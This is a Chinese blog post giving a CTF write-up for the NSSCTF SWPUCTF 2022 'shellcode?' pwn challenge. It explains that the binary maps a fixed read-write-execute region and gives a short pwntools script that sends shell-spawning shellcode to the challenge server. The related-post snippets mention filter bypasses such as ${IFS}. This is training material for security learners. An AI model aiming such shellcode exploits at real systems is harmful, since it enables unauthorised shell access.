NSSCTF Pwn [SWPUCTF 2022 新生赛]shellcode？题解

最新推荐文章于 2025-05-16 11:14:39 发布

艾莉莉阿文

最新推荐文章于 2025-05-16 11:14:39 发布

阅读量183

点赞数 2

分类专栏： BUUCTF Pwn 文章标签：安全

本文链接：https://blog.youkuaiyun.com/qq_33348179/article/details/145441262

版权

BUUCTF 同时被 2 个专栏收录

71 篇文章

订阅专栏

Pwn

57 篇文章

订阅专栏

下载 exeinfo checksec

开启了NX PIE 64位

查看main函数：

发现有个mmap函数查一下：

在固定地址 0x30303000 处创建 4KB 的匿名内存映射，具有可读、写、执行权限

所以将shellcode直接写到上面就能执行

exp：

from pwn import *
context (os='linux', arch='amd64', log_level='debug')
#这行一定要加

p = remote("node5.anna.nssctf.cn", 25971)

shellcode = asm(shellcraft.sh())

p.send(shellcode)
p.interactive()

运行得到flag：

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

艾莉莉阿文

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CSAWCTF-2018-pwn-shellcode 题解

lifanxin的博客

11-29

1519

Write Up知识点关键字样本运行静态分析程序逻辑求解脚本一些细节：wp_shellcode.py 知识点关键字栈溢出，shellcode拆分+组装样本样本来自2018年CSAWCTF的pwn题目shellcode 运行检查文件，发现有两个可以利用的点：栈溢出保护未开启； NX保护未开启，存在RWX段。 $ checksec CSAWCTF-2018-pwn [*] '/home/fanxinli/pwnSample/CSAWCTF-2018/CSAWCTF-2018-pwn'

跟着CTF-wiki学pwn——ret2shellcode

qq_42882717的博客

07-01

1005

CTF-wiki的注解：ret2shellcode

参与评论您还未登录，请先登录后发表或查看评论

pwn-shellcode执行

GalaxySpaceX的博客

08-23

1408

pwn-shellcode执行

NSSCTF [SWPUCTF 2022 新生赛]shellcode？

2401_88087539的博客

02-17

109

pwn新手小白，写完题后整理的一点点思路，有借鉴其他wp，有任何问题各位师傅可以提出，接收批评指正

虎符CTF2022 —shellcode

qq_54894802的博客

09-21

425

我们进行动态调试，先准备手动脱壳的，脱的时候发现居然有反调试，准备动态调试将反调试的patch但是发现很难脱，脱了半天还在循环，可能太菜的原因（T _ T）。或者记下这个地址，我们使用IDA的附加调试，将IDA附加到程序上，因为程序运行到了打印字符了，所以壳肯定是解开了。将程序放入X32DBGz中进行分析，我们按F9运行几次，我们就可以运行到我们的OPE之中了。进入之后，我们进行简单的分析可以发现，这个函数实现的是base64加密。看分析还是比较简单，就是将原本程序里面的两端提示，进行加密的。

2022 SWPUCTF Web+Crypto方向wp

ph0ebus的博客

10-29

7311

简单阅读代码可以发现，__wakeup()方法会首先被激活，覆盖变量的值使flag不能被回显，因此这里需要绕过__wakeup()方法，__wakeup函数是在php在使用反序列化函数unserialize()时，会自动调用的函数。然后想办法读取文件，cat tac tail都被过滤了，那我们还可以利用nl查看文件内容，这里发现数字被过滤了，我们想到了*来匹配，但是*也被过滤了，尽管如此，我们还可以用?但是里面没有看到类似flag的东西，那就进入根目录看看，但是空格被过滤了，可以用${IFS}绕过。

SWPUCTF 2022 新生赛（更新中）

打打CTF

03-25

1423

在线练习地址：https://www.nssctf.cn/problem/sheet/14364

[SWPUCTF 2022 新生赛] 刷题记录

rev1ve的博客

08-12

2024

SWPUCTF 2022 新生赛若调用类中的静态方法，则需要传递一个数组作为第一个参数。数组的第一个元素是类名，第二个元素是要调用的静态方法名。F12，web开发者都被办了，尝试查看源代码，得到。跟第二关相比变成了强等于，直接数组绕过。打开题目，发现加到19就会变成-20。很明显是使用sql注入中的万能密码。一看就是base64加密，直接解码。打开题目，第一关提示在http头。分析一下，提示POST传参，出现。分析一下，进行反序列化时，会让。然后执行函数，且参数值为。绕过后，得到第三关源代码。

CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode

12-10

CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目，该题目主要是利用三个节点来注入shellcode，考验解题人对shellcode的熟悉程度。题解：https://blog.youkuaiyun.com/A951860555/article/details/110350773

2023年SWPU NSS 秋季招新赛 (校外赛道) PWN 题解

2301_77205899的博客

10-24

421

food函数中输入数量 v1为int类型可以为负数只要输入一个较大的负数即可使money>10000。read函数可以溢出 buf距离rbp0xa 但是read可以读入0x10000 后门函数已经给出。简单猜数字不用脚本先输入50 如果大了就再输入25小了就75 以此类推。直接利用pwntools写shellcode即可。然后利用泄露puts地址得到libc基地址。/x00 绕过strlen检测。再执行以下函数door（）exp python3语法。

0ctf-2017-pwn-char 题解

lifanxin的博客

02-05

504

Write Up文件信息漏洞定位利用分析wp总结文件信息该题目来自2017年0ctf的一道pwn题–char。查看文件信息：只开启了NX保护，32位小端程序另外该题目还给了libc.so文件，部署时需要将该库文件放到/home/char/目录下，部署的目录位置可以从程序的伪C代码中看出。漏洞定位程序的main函数如上图所示，首先程序可以接受2400字符的输入，但注意这里的scanf的读取限制，比如：空格、回车、换行符等等都是无法读入的，这里的限制体现在后面构造ROP链时地址中不能含有以

CTF-PWN学习-为缺少指导的同学而生

最新发布

m0_74800552的博客

05-16

298

shiro550反序列化

安全巡检清单

05-15

879

软件状态巡检应深入到系统内核层面。漏洞扫描是软件状态巡检的重要组成部分，需要定期对网络设备、主机、数据库、应用系统等进行全面的漏洞扫描，利用专业的扫描工具发现已知和未知的安全漏洞。通过严格执行本清单所列的各项检查内容，并结合企业自身的业务特点和安全需求进行适当调整和补充，可以有效地提升信息系统的整体安全水平，降低安全风险，为企业的稳健发展提供坚实保障。通过周期性的状态检查、安全扫描、日志分析和补丁管理，可以及时发现并修复潜在的安全隐患和漏洞，确保网络设备、服务器、操作系统及应用系统的高可用性和安全性。

安全版4.5.8开启审计后，hac+读写分离主备切换异常

HighGO

05-16

223

异常：hac集群一主两备环境，开启hgproxy和审计功能后，进行集群主备切换操作。切换过程持续近5分钟，主库方可切换到备节点上，其中未参与切换（原主与新主外的备节点）的备库无法拉起，持续restarting状态很长时间后start failed。解决此问题的安装包：hgdb-see-4.5.8-6954d9f.aarch64.rpm。BUG安装包： hgdb-see-4.5.8-db43858.aarch64.rpm。1、临时解决方案：关闭审计功能，修改审计参数后需要重启集群。系统平台：UOS （飞腾）

AI智能分析网关V4周界入侵检测算法精准监测与智能分析，筑牢周界安全防线

NVR安防视频技术

05-14

533

随着安全防范需求的不断提升，传统周界安防系统存在误报率高、响应迟缓、智能化程度低等问题，难以满足现代化安全管理的要求。

nssctf pwn

10-24

NSSCTF (National Security Service CTF) 是一种网络安全比赛，其中pwn (Payload Writing and Exploitation) 题目通常涉及漏洞利用和内存安全相关的挑战。在这样的竞赛中，参赛者需要找到程序中存在的安全漏洞，如...